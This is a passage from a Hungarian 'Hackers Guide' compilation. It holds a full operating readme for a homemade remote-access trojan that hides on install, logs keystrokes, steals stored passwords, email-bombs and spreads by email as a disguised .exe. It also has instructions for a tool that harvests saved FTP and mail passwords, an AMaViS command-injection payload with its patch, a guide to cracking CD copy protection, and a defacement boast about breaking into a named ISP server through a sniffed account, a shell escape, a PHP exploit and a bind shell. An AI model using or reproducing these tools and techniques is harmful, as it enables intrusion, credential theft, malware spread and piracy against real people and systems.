knyvtrban), s nem ltszik, a Ctrl+Alt+Del menben sem. De ha van egy profibb Task Info programunk ami meg tudja mutatni az pp fut SSZES proramot ott ki lehet szrni a nem odavalt. Persze ehhez is kell egy kis gyakorlat s hozzrts, mert ugye nem rt ha nem a kernel32.dll-t vagy az explorer.exe-t ljjk ki! =) A tvoli admin trojanok egyszeren nyitnak egy portot a gpen s onnantl brki felcsatlakozhat r. Persze le lehet jelszavazni a szervert, vagy esetleg tlltani a portot, s akkor csak az frhet hozz aki felrakta. (Vagy aki feltrte a jelszt. =)) A RAT (Remote access trojans) programok taln az egyik legjobban kitallt programok, amiktl ha profin van feltve a rendszerre elg nehezen lehet megszabadulni, ht ha mg lma is az illet... =)) Azok viszont akik hasznljk ezeket a programokat vigyzzanak mert knnyen visszafel fordulhat a tmads s magukat fertzhetik meg. Tallkoztam mr olyannal, hogy egy trojai kliens rszhez hozz volt fzve a szerver rsz is, szval aki jt akart szrakozni msokkal az lehet hogy sajt maga vlt ldozatt, ha elindtotta a klienst. (Nlam megszvta mert a TaskInfo s a Registry monitor egybl kiszrta... =)) Jelsz lop trjai programok: Ezeknek a trjai programoknak az a feladatuk, hogy sszegyjtsk az ldozat PCjrl az sszes fellelhet, elmentett jelszt s/vagy jelsz fjlt (amikbl majd megfejthet a jelsz) s elkldik egy meghatrozott e-mail cmre vagy icq szmra, gy, hogy azt az ldozat nem veszi szre. Vagyis sajt kis e-mail/zenet kld programmal rendelkeznek. Szval senki se keresse az Outbox/Kimen levelek mappban a levelez programjban! =) Billentyzetfigyelk: Ezek a trjai programok nagyon egyszerek. Mindssze naplzzk az ldozat Pc-jn a bekapcsolstl a kikapcsolsig lettt szes billentyletst. Ezek a trjaik is elindulnak automatikusan minden windows indtskor, teht csak egyszer kell elindtani ket, s onnan mr csak a log file megszerzse az egyetlen gondd! Van olyan opcijuk is, hogy ha rzkelik, hogy online van az ldozat s a keylog feltevje is online van akkor nem log fileba rja a letseket, hanem azonnal elkldi a tmadnak. Rombol trjai programok: Ezeknek a programoknak 1 cljuk van a rombols. Ha mr rajta vannak az ldozat gpn, s nem veszi idben szre akkor mr ks bnat... Ezek automatikusan letrlik a belltott file-neveket pl.: *.dll *.ini s *.exe nev fileokat a szmtgprl.
17
Hackers Guide
FTP trojai programok: Ezek a trjai programok megnyitjk a gpeden a 21-es (FTP) portot s gyakorlatilag a gped tvedlett egy FTP szerverr. Fel s le lehet tlteni a gpedre/rl. Trlni lehet rla, tnevezni. Gyakorlatilag a kliens kezben egy file manager van, ahol viszont a szerver lehet tbb 1000 km.-re is. Eredeti: tH3 m4n!4c dancho@mbox.digsys.bg - H3XR00T http://hexnet.hpage. net/
************************************************************************************************
me$$iah trojai program
"Kiskorombl emlkszem, hogy mr a farkas tetszett a mesben..." Bevezet: Ebben a lersban a mE$$iAh-nak keresztelt trjai programomat fogom bemutatni. Ha nem tetszik, nem kell elolvasni. Ltezik ennek a doksiknak egy angol vltozata is, de tekintve hogy a nyelvet milyen magas szinten beszlem, nagyon jl sikerlt :) Hadd emeljek ki pr zeltt a program szmtalan lehetsge kzl:) - a tvoli szmtgpet akr a mobiltelefonodrl is vezrelheted! Hogy hogyan?! Nagyon egyszer, csak kldd el a telefonodrl sms-knt egy email cmre az utastsokat, s a szerver vgre fogja ket hajtani. (persze azrt ne essnk tlzsokba, arra a cmre kell kldeni amit eltte belltottl :)) - akr tbb gpet is vezrelhetsz egyszerre a mobilodrl!! - kldhetsz emailbombt... s mg az IP-d miatt se fog felhvni az internetszolgltatd, hogy rosszat jtszottl :) Ugye nem hangzik rosszul? :)
Egy kis elzmny:
18
Hackers Guide
Eddig csak egy bta verzi volt elrhet, kizrlag ismersk szmra, teszt cljbl. Sajnos elg kevs visszajelzst kaptam. Szval brmi tleted szrevteled van, nyugodtan megrhatod. Mi az j a mE$$iAh v1.0 -ban? 2000.08.18. [*] j readme file, kijavttam az angol hibkat, tovbb ez a magyar verzija is idekerlt :) [*] volt egy bug, vagyisinkbb figyelmetlensg, miszerint ktszer be lehetett indtani a szervert. Na ezt kijavtottam. [+] Van egy adag j parancs: MD, RD, DIR, STARTKL, STOPKL, STARTFTP, STOPFTP, STARTBOMB, STOPBOMB, MSGSHOW, WALLP, CACHEPWZ, SLEEP, SOUND, LISTPROCESS, KILLPROCESS, DONTDELETE, INFECT [-] A PWZ parancs mr nem el, helyette lehet hasznlni a RASPWZ-t. [+] Elkszlt a makeserver is, amit stlusosan tHe_G0D-nak neveztem el, lehet vele sajt szervert csinlni :) [*] A klienst is jrartam (:-) s persze j neve is van: mADaNgEl. Ksznet a logrt Nestan-nak! (meg klnben is rdemel egy nagy thankset a grafikai segtsgeirt) [*] Az MSG parancs is megvltozott, ezentl MSGDRAW nven rhet el. [*] Kicsit optimalizltam a kdon. [+] A szerver hrom vletlenszer fjlnevet hasznl arra, hogy hova msolja magt a WINDOWS\SYSTEM knyvtron bell. [+] Formater is sokat segtett, rszletes bug-lerssal, stb. St, kszti a linuxos klienset!... Nagy nagy ksznet!
Fjlok: madangel.exe- ez a kliens... - mrete: 307.200 messiah.exe- ez a szerver... - mrete: 196.608 readme.txt- ez az, amit ppen olvasol - mrete: XXXXXX thegod.exe- ez a makeserver... - mrete: 142.336
A szerver lehetsgei: [a pldk ilyen zrjelekben vannak] Installls: - a szerver rejtzkdve installlja magt - s automatikusan indul minden windowsindtsnl... Megjegyzs: Az installlshoz elg beindtanod a szerver exe-jt, s utna akr le is trlheted, hiszen a szerver gyis belemsolja magt a system knyvtrba! Belltsok: - a szervert levdheted jelszval, az alaprtelmezett: SPY [+PASWjjelsz]
19
Hackers Guide
- a szerver alaprtelmezett portja 2000, s ezzel a paranccsal megvltoztathatod: [+PORTjportszm] - lellthatod a szervert [+CLOSE] - s el is tvolthatod a gprl, ezutn nem fog beindulni tbbet [+REMOVE] - bellthatod a POP3 hostot, amin keresztl emailben elrheted a szervert: [+POPHSTpldahost] - Ehhez meg kell adnod a felhasznlnevet [+POPUSRpldafelhasznl] - s az ehhez tartoz jelszt: [+POPPWDpldajelsz] - bellthatod az SMTP-t, hostjt: [+SMTPHSTpldahost] - Meg kell adnod, hogy mi legyen az emailcm eleje ha a szerver levelet kld, a cm vge pedig az smtp hostja lesz [+SMTPUSRpldauser] - s bellthatod azt az emailcmet, ahova a szerver fogja kldeni a leveleket: (pl. email rtests ha a szerver online) [+SMTPS2pldaemailcm] - bellthatod a POP ellenrzs gyakorisgt (az alaprtelmezett 60000szzadmsodperc) [+TIMERpldaszzadmsodperc] Megjegyzs: Mindhrom POP belltst meg kell adnod hogy emailben/mobilrl vezrelni tudjad a szervert, illetve hogy emailben tudj feltlteni fjlt. Ha az SMTP belltsokat is kitltd, akkor mr kaphatsz email rtestst, amikor a szerver szmtgp a netre kapcsoldik. A szerver az online llapotot idszakosan ellenrzi, a gyakorisg belltshoz a TIMER parancsot hasznlhatod, lsd feljebb. Addig nem tudod mobilrl irnytani a gpet, amg nem lltod be megfelelen a POP3-as dolgokat. Fjl kezels: - elindthatsz fjlt a szerveren: [+EXECbeindtandfjl paramter] - trlhetsz a szerverrl fjlt: [+DELtrlendfjl] - msolhatsz fjlt a szerveren [+COPYforrsfjl clknyvtr] - thelyezhetsz fjlt a szerveren, (ez akr tnevezs is lehet) [+MOVEforrsfjl jneve] - elkldetheted emailben a fjlt, amit meg akarsz szerezni a szerverrl [+GFILEmelyikfjlttltskle] - knyvtrat hozhatsz ltre a szerveren [+MDknyvtrnv] - le is trlhetsz knyvtrat (akrcsak a deltree, teht rekurzvan!!) [+RDknyvtrnv] - kilistzhatod a fjlokat a szerveren (az alaprtelmezett *.*) pl:
20
Hackers Guide
[+DIRc:\*.*] - a szerverrel tovbbkldheted magt egy megadott emailcmre clinton.jpg.exe nven, s a trgy valami nagyon vicces lesz :) [+INFECTutlunk@billi.com] Megjegyzs: gy akr emailen keresztl is lebonyolthatod a fjlforgalmat. Feltltshez a POP belltsoknak rendben kell lennik, s arra az emailcmre amit megadtl, simn csatold el a fjlt. Persze ez elg krlmnyes, hasznld inkbb a szerver FTP szervert :) Vegyes: - cd tlca kinyitsa [+CDOPEN] - cd tlca bezrsa [+CDCLS] - monitor kikapcsolsa [+MONOFF] - monitor bekapcsolsa [+MONON] - aktulis ablak/program bezrsa [+CAW] - zenetklds ablakban [+MSGSHOWEz egy plda zenet] - zenetklds rajzolva [+MSGDRAWEz egy plda zenet] - httrkp megvltoztatsa, pl: [+WALLPc:\logo.sys] - hang lejtszsa, pl: [+SOUNDc:\windows\media\The Microsoft Sound.wav] Szmtgp: - suspend mdba kapcsols [+SUSP] - gp jraindtsa [+REBOOT] - gp kikapcsolsa [+POWER] - gp lefagyasztsa [+LOCKUP] - keyloggols indtsa (az alaprtelmezett mentsi hely C:\WINDOWS\SYSTEM\WINA386.DLL) [+STARTKL] - szerver lelltsa [+STOPKL] - FTP server indtsa [+STARTFTP] - FTP server lelltsa
21
Hackers Guide
[+STOPFTP] - emailbomba kldse (paramter nlkli parancs esetn az elz cmzettnek fogja a bombt kldeni a szervert) [+STARTBOMBemailcm] - bombzs lelltsa [+STOPBOMB] - fl percre lellthatod a szerver parancsfeldolgozst Ez pl arra j, ha tbb parancsot kldesz egyszerre: [+CDOPEN+SLEEP+MSGSHOWyou fuck+SLEEP+OPENCD] Megjegyzs: a gpkikapcsols NT alatt asszem nem mkdik. A lefagyasztsnak viszont mkdnie kell(ene). Az emailbombzs addig megy, amg le nem lltod... Informcik: - RAS jelszavak lekrse [+RASPWZ] - cache-ben trolt jelszavak lekrse [+CACHEPWZ] - aktulis felhasznlnv [+CUSER] - windows knyvtr [+WDIR] - aktv processzek lekrdesze [+LISTPROCESS] - fut processz lelvse [+KILLPROCESSprocessazonostbetje]
Utols megjegyzsem:): a mobilon keresztli vezrlshez az POPUSR@POPHST cmre kell kldened az sms-t. A parancsoknak a trgyban kell lennik. Egyszerre tbb parancsot is hasznlhatsz, pl: +CDOPEN+MSGSHOWKapd be!+LOCKUP Ha tbb gpet is szeretnl egyszerre vezrelni, akkor mindegyiknek ugyanazt a POP kiszolglt kell megadni s persze ugyanazt a mailboxot. Ezutn a parancsot a kvetkezkppen kldheted: [+DONTDELETE+MSGSGOWhello] Mindegyik gp vgre fogja hajtani a parancsot, egszen addig amg nem kldesz egy olyan zenetet amiben nincs benne a +DONTDELETE parancs. Pl: [+MSGSGOWstop!]
Eltvolts Az eltvolts legegyszerbb mdja +REMOVE parancs kldse a szervernek. Manulis eltvoltshoz kvesd az albbi lpseket: trld a JYService regisztri bejegyzst az albbi cmrl:
22
Hackers Guide
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices Utna trld le a C:\WINDOWS\SYSTEM\J4YSRV.EXE s/vagy C:\WINDOWS\SYSTEM\WINAPI.EXE s/vagy C:\WINDOWS\SYSTEM\MAPISRV.EXE fjlokat. A szerver a belltsokat szintn a regisztriben trolja: HKEY_LOCAL_MACHINE\Software\Spy Termszetesen ezt is trlheted.
Ksznet Formater - ez a program nem jhetett volna ltre a segtsged nlkl! Nestan - kszi mindent, de akkor sem hiszem el hogy iszol :))) skYro - kezd krekk lpseim :) Xanthos - sok sok mindent ksznhetek mr :) GutyKa - hogyhogy nem vettem szre a te trojanodat korbban? Yamin - tst kapni szmtekbl, ehhh :) $tephen - aki elindtott az underground plyn :) Trevor - els fordtsaim :)) Taki - akinek az tlete volt ez az egsz trjan dolog :) Asdef Gehaj - NT tesztels :) Sun-Zero - iz egsz j dolog ez a hkker let :))))))))))))))))))) Pepe - support rulez :) "I hate people that are lame." /Offspring/ Szval a seggfejek bekaphatjk. Te is MadMind!
Ennyi! Asszem elmondtam mindent, amit tudnod kell. Ha van krdsed rj. De azrt ezt a fjlt olvasd csak t eltte mgegyszer, mert klnben leharapom a fejedet. :) Az emailcmem:rsctm@freemail.hu Megprblok minden levlre vlaszolni... Ha a linux klienssel kapcsolatban vannak krdseid, rj Formaternek:formater@thepentagon.com Enjoy... -=|R|S|C|=-
************************************************************************************************
RSC's Offline Server Emulator
23
Hackers Guide
Egy kis bevezet A programmal brmilyen interneten keresztl kommunikl kliensprogram jelszavait kinyerhetjk. gy hasznlhat email kliensekhez, FTP kliensekhez, stb. Most joggal krdezheted, hogy mi szksg van erre, ha ltezik tbbezer "kicsillagoz" program. Ht azrt, mert pl. a Far Manager FTP kliens rszhez, vagy a The Bat jelszavaihoz azok a programok nem hasznlhatk. Egy hasonl program, a MailPSW adta az tletet, hogy ksztsem el ezt a progit. Gyakorlatilag az RSC-Emu ugyanarra a lehetsgre ptkezik, csak sokkal sokoldalbban hasznlhat. Hogy hogyan is mkdik a dolog? A kliens programok legtbbje rendelkezik egy olyan lehetsggel, hogy a jelszt elmenti valamilyen kdolt formban, hogy azt ne kelljen annyiszor berni. Aztn amikor szksg van r, akkor a program dekdolja a jelszt, s elkldi a szervernek. (Szksges, hogy dekdolhat algoritmussal kdolt jelszavakrl legyen sz, klnben maga a kliens program sem tudna semmit sem kezdeni velk, mikor kell.) Ez viszont azt jelenti, hogy a tranzakci kzben a kliens kiadja a jelszt, s ez lehetsget ad egy univerzlis jelszvisszalltsi lehetsgre, a szerver emullsra. A program mkdsnek alapja a Microsoft TCP/IP stack host kezelse, ami ugyanis lehetv teszi, hogy egy akrmilyen host-hoz msik IP-t rendeljnk. Az RSCemu teht a krdses host-hoz ideiglenesen hozzrendeli a 127.0.0.1-et (gy.k. localhost) ahol a megadott porton mr nyitott egy olyan szerversocket-et, ami minden kapott adatot kir a kpernyre. Persze a dolog ennl azrt egy kicsit bonyolultabb. A jelszklds ugyanis a tranzakcinak nem az els lpse. Ezrt van lehetsg sajt protokollok definilsra is, vagyis mi adhatjuk meg azt, hogy a szerver mit vlaszoljon a kliensnek. Az els sort mindig a szerver kezdi, ha brmit ki akarunk hagyni, akkor egy res sort szrjunk be. Az FTP s POP3 kliensek szmra elksztettem azt a pr sort, ami szksges ahhoz, hogy a kliens kiadja a jelszt. Hasznlati utasts :) 1. Indtsuk el... 2. Tltsk ki a szksges informcikkal 3. Nyomjuk meg a Start server gombot 4. Csatlakozzunk a kliens programmal 5. Lessk meg az eredmnyeket 6. Stop server gomb megnyomsa... 7. Ha brmi problma trtnik kzben, pl lefagy a Windows, akkor a program nem tudja letrlni a C:\WINDOWS\hosts llomnyt, ez esetben ezt neknk kell megtenni "kzzel"!! Lssuk egy pldn keresztl. Tegyk fel, hozzfrnk hirtelenjben egy szmtgphez, amin van Far, s hasznljk is az ftp kliens rszt. Akkor beindtcsuk szpen gyorsan a programot, s az RSC-emu -t is, host-nak berjuk azt, ahonnan meg akarjuk tudni a jelszt, pl lamerka@ftp.extra.hu s mivel FTP-rl van sz, kivlasztjuk az FTP jellngyzetet. A Start server
24
Hackers Guide
gombbal elindtjuk a dolgot, Far-ral nyomunk egy entert az ftp.extra.hu -n, ki is rja, hogy a jelsz nem megfelel, de lss csodt az RSC-emu-ban ott virt a lamerka@ftp.extra.hu-hoz tartoz jelsz. Stop szerver gombra rtnk mg egyet, aztn lelpnk a tett helysznrl. Bugzs? RSC's Offline Server Emulator nem mkdik az olyan kliens programok esetn, amik nem hostnv alapjn, hanem IP cm alapjn keresik a szervert. (Pl 194.58.127.11-et hasznl valamilyenszerver.com helyett.) Ekkor, ha van r lehetsg, lltsd t 127.0.0.1 -re. Nhny program megengedi, s gy mris tkletes lesz a dolog. Letlts - Tltsd le innen az RSC's Offline Server Emulator-t
-=R|S|C=- rsctm@freemail.hu 'lamerz can fuck off...'
************************************************************************************************
AMaViS root exploit Chris McDonough <mcdonc@IQGROUP.COM> AMaViS: berkezo levelek virusellenorzesere valo program. A tamadonak lehetove teszi, hogy parancsot futtasson a gepen root-kent. Virusos level kuldesenel a REPLY-TO mezot kezeli hibasan. A virusjelentest kuldo script egyik sora: cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2 Ami a $2-t szepen vegrehajtja ... Gyors patch: --- scanmails.orig Wed Jun 30 12:54:02 1999 +++ scanmails Wed Jun 30 12:54:15 1999 @@ -122,6 +122,50 @@ deliver=/usr/bin/procmail
25
Hackers Guide
+ ############################################################ ### +# Chris McDonough informed us, that it is possible to execute # +# programs by sending an email, wich contains a virus and has # +# as return address something like: # +# `/sbin/reboot`@softing.com # +# or # +# $(/sbin/reboot) @softing.com # +# The execution of the command (/sbin/reboot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + +# substitute all "`","$(",")" to nothing +receiver=${7//\`/} +receiver=${receiver//\$$/} +receiver=${receiver//$/} + +sender=${2//\`/} +sender=${sender//\$$/} +sender=${sender//$/} + +if [ "$sender" != "$2" -o "$receiver" != "$7" ] ; then + cat <<EOF | ${mail} -s "Intrusion???" ${mailto} + ############################################################ ### +# Chris McDonough informed us, that it is possible to execute # +# programs by sending an email, wich contains a virus and has #
26
Hackers Guide
+# as return address something like: # +# \`/sbin/rebbot\`@softing.com # +# or # +# \$$/sbin/rebbot$ @softing.com # +# The execution of the command (/sbin/rebbot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + $7 or $2 is not a valid Email address + (changed to $receiver and $sender)! +EOF +fi +# + ################################################ # main program # # -------------# @@ -171,8 +215,8 @@ echo xxxxxxxxxxxxxxxxxx`date`xxxxxxxxxxxxxxxxxxxxxxx > ${tmpdir}/logfile echo ${scanscriptname} called $* >>${tmpdir}/logfile -echo FROM: $2 >>/${tmpdir}/logfile -echo TO: $7 >>/${tmpdir}/logfile +echo FROM: $sender >>/${tmpdir}/logfile +echo TO: $receiver >>/${tmpdir}/logfile ${metamail} -r -q -x -w ${tmpdir}/receivedmail > /dev/null 2>&1 @@ -597,11 +641,11 @@ ################### send a mail back to sender ######################
27
Hackers Guide
-cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2 +cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $receiver" $sender VIRUS ALERT - Our viruschecker found a VIRUS in your email to "$7". + Our viruschecker found a VIRUS in your email to "$receiver". We stopped delivery of this email! Now it is on you to check your system for viruses @@ -614,12 +658,12 @@ ############### send a mail to the addressee ######################## -cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM $2" $7 +cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM $sender" $receiver VIRUS ALERT + Our viruschecker found a VIRUS in a mail from "$2" "$sender" to you. Delivery of the email was stopped! -Kis-Szabo Andras -----------------------------/ kisza@sch.bme.hu
Technical University of Budapest Schonherz Zoltan Dormitory /-------------------------------3OO---->>.Info
************************************************************************************************
CD-k msolsvdelmnek megszntetse Felhasznlt dokumentum: "Hack-FAQ <Volume 5>" /Wang/
28
Hackers Guide
Itt van a leggyakoribb CD-vdelmek listja. A CD-vdelem arra szolgl, hogy a jtkokat s alkalmazsokat ne tudd lemsolni. A legtbb program s fjl, amire albb hivatkozok, a http://www.cdrsoft.com cmrol szrmazik. CD-Cops Ha a CD a CD-Cops-al van vdve, akkor a fo .exe fjl indtsakor egy ablak jelenik meg a fejlcben a "CD" s "Cops" szavakkal. Tovbb a kvetkezo fjlok az install knyvtrban vannak: CDCOPS.DLL, s fjlok .GZ_ s .W_X kiterjesztssel. Ezt a tpus vdelmet a "CD-Cops decrypter" nevu programmal lehet megtrni, amely a legtbb CD-vel mukdik. Copylok Nincs rla adat. Copy-Protected CD & The Bongle Jelenleg nincs ltalnos patch, minden egyes CD-hez kln kell cracket keresni. DiscGuard Egy DiscGuard-dal vdett CD install knyvtrban vannak az albbi fjlok: IOSLINK.VXD IOSLINK.SYS Jelenleg nincs ltalnos patch, minden egyes CD-hez kln kell cracket keresni. LaserLock A Laserlock-kal vdett CD-ken van egy rejtett knyvtr, "Laserlok" nven. Ebben a knyvtrban olyan fjlok vannak, amelyek olvashatatlan hibkat tartalmaznak, hogy a CD-t ne lehessen rendesen lemsolni. Jelenleg nincs ltalnos patch, valsznuleg minden CD-hez kln cracket kell keresni. Nhny esetben a vdelem megkerlheto, ha a CD-r programban belltjuk az "Ignore Read Error" lehetosget (CDRWin, Nero, DiskJuggler). LockBlocks A LockBlocks-vdett CD kt krt tartalmaz (egy 5mm s egy 3 mm szlessgut), ezek a CD-rt kifagyasztjk. Jelenleg nincs ltalnos patch, minden egyes CD-hez kln kell cracket keresni. SafeCast Jelenleg nem ismert a feldertse. SafeDisc A kvetkezo fjloknak kell a CD-n lenni:
29
Hackers Guide
00000001.TMP CLCD16.DLL CLCD32.DLL CLOKSPL.EXE GAME.EXE (a game a jtk neve) GAME.ICD (a game a jtk neve) A megtrshez kszts egy 1:1 msolatot a CD-rol, aztn hasznld a "Generic SafeDisc Patch" -et (http://www.cdrsoft.com), ez lehetov teszi, hogy futtasd a msolatot. Egy msik mdszer, hogy keresel egy patchelt game.exe-t, s utna a kvetkezoket csinlod: Kszts egy image-t a CD-rol a harddiskre, de a game.exe-t cserld ki a patcheltre. A CD-r meghajtt hasznld az image kinyersre, mert sokkal jobban kivdi az olvassi hibkat. Utna rd fel az image-t egy res CD-re, egyszeres sebessggel (ez hibavdettebb). SecuROM A CD install knyvtrban vagy a root knyvtrban a kvetkezo fjloknak kell lennik: CMS16.DLL CMS_95.DLL CMS_NT.DLL A vdelem kinyrshoz hasznld valamelyik ltalnos patchet az albbiak kzl: SecuROM R1-hez: Generic SecuROM R2 SecuROM R2-hz: Generic SecuROM R3 SecuROM R3-hoz: Generic SecuROM R4 v1.1 SecuROM R4-hez: Generic SecuROM R5 v5.1 SecuROM R5-hz: Generic SecuROM R5 v6.0 Bazinagy fjlok Keress bazinagy fjlokat a CD-n, gyakran 600megnl is nagyobbakat, a rootknyvtrban (ltalban .AFP kiterjesztsuek). Ha a CD kisebb, mint 659 megs, akkor egy egyszeru CD msolssal megoldhat a dolog, de ha nagyobb, akkor csinlj egy tlmretes 74 perces CD-t (OverSize) vagy hasznlj 80 perces res CD-t. Illegal Table Of Contents (TOC) fjl Meg kell nzni a CD-n levo trackeket. ltalban gy tunik, mintha lenne egy msodik adat-track (ami tilos). ltalban nhny audio track utn jn ez a msodik adat-track. Ez a fajta msolsvdelem most mr kikerlheto pl. a Nero-val vagy a CDRWIN programokkal. Ezeknek van egy olyan belltsuk, hogy figyelmen kvl hagyjk a hibs TOC fjlt. CD-tlgets (OverBurning CDs')
30
Hackers Guide
Felismershez egy 74 perces rhat CD-t hasznlj, s az rs elott csinlj egy tesztet. Ha az eredeti CD-t tlgettk, a CD-r program hibt fog jelezni, miszerint a CD nem elg nagy (mg ha az eredeti s az rhat CD is egyarnt 74 perces!!). Hasznlj Nero-t vagy CDRWIN-t, s gesd tl a CD-t egy megfelelo CD-r meghajtval (teht nem mindegyikkel lehet). Veszlyes lehet a muvelet, ha a CD-rd nem tmogatja a tlgetst! Ha az eredeti CD 74 perces, akkor msodik lehetosgknt vegyl egy 80 perces rhat CD-t s rd r arra. A Half Life, a Kingpin s a Commandos is ezt a tpus vdelmet hasznlja. Fizikai hibk A CD direkt meg van ronglva. Sok CD-olvas nem tudja msolni ezeket a hibkat s lellnak az olvasssal. Nhny CD-olvas viszont tudja. A "Blindread" nevu program viszont nagyon hasznos lehet az ilyen vdelem kikerlsre. PlayStation CD-k A bootols alatt a PSX chipset ellenoriz egy ismeretlen szektort a CD-ken. Ezt a szektor a CD-olvas fej nem tudja elrni. Emiatt nem lehetsges, hogy lemsold a CD-t. A kikerlshez vegyl egy mdostott Boot chipet (ModChip) s cserld ki a Playstation-ban levovel. Ez megtveszti a PlayStationt, teht ezentl azt gondolja majd, hogy a berakott CD a megfelelo orszg-azonostkat s szektorokat tartalmazza. Sega DreamCast CD-k A Dreamcast valjban GD-ROMokat hasznl, amelyek maximum 1GB adatot tartalmazhatnak a standard CD-k 650/700MB-jval szemben. Ez j msolsvdelmet jelent, mert egy egyszeru CD-rval nem lehet ilyen lemezeket rni. A GD-ROM-on 2 adat-track tallhat. Az elso mrete gyakran 10MB - 50MB kztt van s egy norml CD-olvasval olvashat. A msodik nagy surusgu formtumban van felrva, s egy norml CD-olvas nem tudja olvasni. Jelenleg nincs tkletes mdja ezeknek a CD-knek a msolsra.
************************************************************************************************
amstel.interware.hu feltrse
This Site owned by :
31
Hackers Guide
Udv az osszes nagyfeju ISP rendszergazda/security gurunak (aka: GRIN, GUSKAHAX0R, MAG, CYD, MicMac, Bivanbi, KalverKocsog, Atya-Bazsa es az osszes LME geci). Ez a deface azert keszult, hogy bebizonyitsuk magyarorszagon nem csak obotakgeci, dc1geci, madmindgeci szintu scriptkiddie like "allitolagos hackerek" leteznek. Kicsit nevetseges az ami a mediaban manapsag csinal a hozza nemerto lamer alatokbol. Ezert itt egy prezentacios hack ! =) A tamadas az INTERWARE egyik "kisegito" szervere ellen iranyult. Mi is tortent itt. (Aki nem hiszi el az jarjon utanna, bar mi az igazat irjuk le) :
Adott volt egy sniffelt account (switchelt halorol szereztunk, erdekes erre mondjak azt hogy nem sniffelheto ? Lenyegtelen, csak okoskodnak :) Az account mogott egy szerver volt: amstel.interware.hu. A szerveren ssh service. A sniffelt accountnak volt SSH elerese. shellje a pine nevu levelezokliens... A pine nem okozott komolyabb problemat, egy /bin/bash -c /bin/bash; alternativ editor gyorsan dobta a shell-t. Ezutan ismerkedtunk meg a rendszerrel:
o o o o
2.2.17-es linux kernel A kernelben ott vigyorgott a cryptopatch Egy darab C fordito sincs kozel 's tavolban... Nagyon jol felkonfigolt packetfilter (ipchains). A pop3 port pl kernel/ipchains-bol filterezve,stb. (ha netan a daemonban bug lenne ? :))) Jol belott syncookies,rpfilter vedelem tripewire, portsentry vedelem Debian 2.2 distribucio, a legfrissebb fixekkel. Uj Glibc Uj traceroute hostconf-os trukk nem megy, kernel tul regi hozza (szerencsejukre) szeparalt filerendszer, nosuid, noexec, stb. (hardlink attack eleve kizarva)
o o o o o o o
bash-2.03$ mount
32
Hackers Guide
/dev/sda5 on / type ext2 (rw,errors=remountro,errors=remount-ro) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sda1 on /boot type ext2 (ro) /dev/sda6 on /home type ext2 (rw,noexec,nosuid,nodev) /dev/sda7 on /var type ext2 (rw,nosuid,nodev) /dev/sda8 on /var/mail type ext2 (rw,noexec,nosuid,nodev) /dev/sda9 on /var/lib/mysql type ext2 (rw,noexec,nosuid,nodev)
o
szeparalt web groupok (kb 50 darab kulonbozo group a www-data alatt, amelyekhez kulon auth tartozik.) semmilyen folosleges daemon, csak ami a mukodeshez kell Erosen leredukalt setuid allomany, amin nem kell hogy feltetlenul setuid legyen, azon itt tuti nincs :) a /etc/apache csak root szamara OLVASHATO!!! Nem is lathattuk, hogy mi van benne. Localis security magas szintu. Userek konyvtarai abszolut szeparaltak, egyetlen user sem kepes olvasni mas user adatait. Szeparalt administrator reteg. (csak par usernek van rendes shellje) A mi userunk veletlenul kiemelten powerfull volt, a legtobb usernek /bin/false a shellje
o o
o o
o o
Szoval meg a MAG koma sem mondhatja azt, hogy ez egy tipikus "szar" gep. MERT TENYLEG NEM AZ. Tisztelet a rendszergazdaknak, ennyire szeparalt rendszert karban tartani meg szerintunk is komoly munka :) Vagy nagyon megfizetik ezert oket, vagy mazochista allatok. (UGYE MAG ? Vannak olyanok akik nem predikaljak, hanem csinaljak ???)
A local HACK:
Ugyebar mint azt leirtuk, ./-es local exploitot el lehet felejteni, a szokasos mokakat is lehet elrakni. Ami itt jon az tenyleg a "FEELING" Nonpublic PHP exploiton keresztul sikerult krealnunk egy shell-t amelynek euid-ja, egid-je www-data volt.
bash-2.03$ id uid=33(www-data) gid=1001(uzlethaz) groups=1001(uzlethaz)
33
Hackers Guide
Ezzel mar minimalisan hozzafertunk par filehoz, de ezutan szembesultunk vele, hogy a www-data group nem tud olvasni szinte semmit, mivel a webgroupok kulon szeparaltak. Egy ujabb rogtonzott megoldassal a phpn keresztul csinaltunk egy bash_on_port-ot, melyet teljes jogulag az apach futtatott, igy hozzafertunk a szeparalt groupokhoz. Innentol mar mindenhez hozzafertunk amihez az apach hozzafert. Kezdve az osszes hostolt oldal osszes adatahoz.
bash-2.03$ telnet 0 1111 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. Gimme pass: ************ sh: no job control in this shell sh-2.03$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data),1005(planetweb),1006(web), 1007(agility),1008(foldnapja),1009(grafo),1010(e-start),1011(pitvar),1012(danubi anadesign),1013(szinyei),1014(bignet),1015(fizetesinfo),1016(thr),104(loggers),1 017(canderel),1018(portar),1019(windrivers),1020(trax),1022(gfkdorelipms),1023(k ioszk),1024(regiszter),1025(pityer),1026(telepito),1027(e-contact),1028(tutynet) ,1029(afilmsite),1030(loyolacollege),1031(webkom)
